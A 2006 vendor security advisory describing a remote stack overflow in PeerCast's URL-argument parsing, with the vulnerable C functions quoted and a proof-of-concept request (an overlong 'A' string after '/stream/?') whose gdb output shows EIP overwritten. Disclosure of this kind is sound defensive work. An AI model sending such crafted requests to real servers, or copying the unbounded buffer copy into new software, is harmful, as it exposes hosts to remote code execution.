INFIGO IS Security Advisory #INFIGO-2006-03-01 http://www.infigo.hr/ Title: PeerCast streaming server remote buffer overflow Advisory ID: INFIGO-2006-03-01 Date: 2006-03-08 Advisory URL: http://www.infigo.hr/in_focus/INFIGO-2006-03-01 Impact: Remote code execution Risk Level: High Vulnerability Type: Remote and local Vendors Status: Vendor was first contacted on 7th March 2006. ==[ Overview PeerCast is a simple, free way to listen to radio and watch video on the Internet. It uses P2P technology to let anyone become a broadcaster without the costs of traditional streaming. This means you get to hear and watch stations not normally found on commercially funded sites. PeerCast is available for Linux, Windows and MacOS platforms. More information can be found on http://www.peercast.org. ==[ Vulnerability After short research, high-risk vulnerability was discovered in PeerCast Streaming server. Unauthenticated remote user can send specially crafted request to the HTTP server that will cause stack overflow, what can be easily exploited for remote code execution. The problem is present in URL handling code. When user requests special URL on the server (like 'stream'), arguments are processed with procConnectArgs() function. Vulnerable code in /code/common/servmgr.cpp ---------------------------------------- void ServMgr::procConnectArgs(char *str,ChanInfo &info) { char arg[512]; char curr[256]; char *args = strstr(str,"?"); if (args) *args++=0; info.initNameID(str); if (args) { while (args=nextCGIarg(args,curr,arg)) { ... ... ... ---------------------------------------- Function procConnectArgs() will process arguments (char *str) passed to the server script. Both buffers (arg[512] and curr[256]) allocated on the stack can be overflowed inside of nextCGIarg() function in while() loop if too long string is passed after '?' character in URL. Vulnerable code in /code/common/servhs.cpp: ------------------------------------------- char *nextCGIarg(char *cp, char *cmd, char *arg) { if (!*cp) return NULL; // fetch command while (*cp) { char c = *cp++; if (c == '=') break; else *cmd++ = c; } *cmd = 0; // fetch arg while (*cp) { char c = *cp++; if (c == '&') break; else *arg++ = c; } *arg = 0; return cp; } ---------------------------------------- ==[ Affected Version PeerCast v0.1215 and lower. ==[ Fix Upgrade to PeerCast v0.1217 ==[ PoC Exploit URL: http://localhost:7144/stream/?AAAAAAAAAAAAAAAAAAAAAAA....(800) gdb output... [Switching to Thread 180236 (LWP 4526)] 0x41414141 in ?? () (gdb) i r eax 0x0 0 ecx 0x74 116 edx 0x741c9f20 1948032800 ebx 0x4011fff4 1074921460 esp 0xbe3f9e84 0xbe3f9e84 ebp 0x41414141 0x41414141 esi 0x41414141 1094795585 edi 0x41414141 1094795585 eip 0x41414141 0x41414141 eflags 0x210246 2163270 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 (gdb) ==[ Credits Vulnerability discovered by Leon Juranic . ==[ Contact INFIGO IS Web: http://www.infigo.hr E-mail: infocus@infigo.hr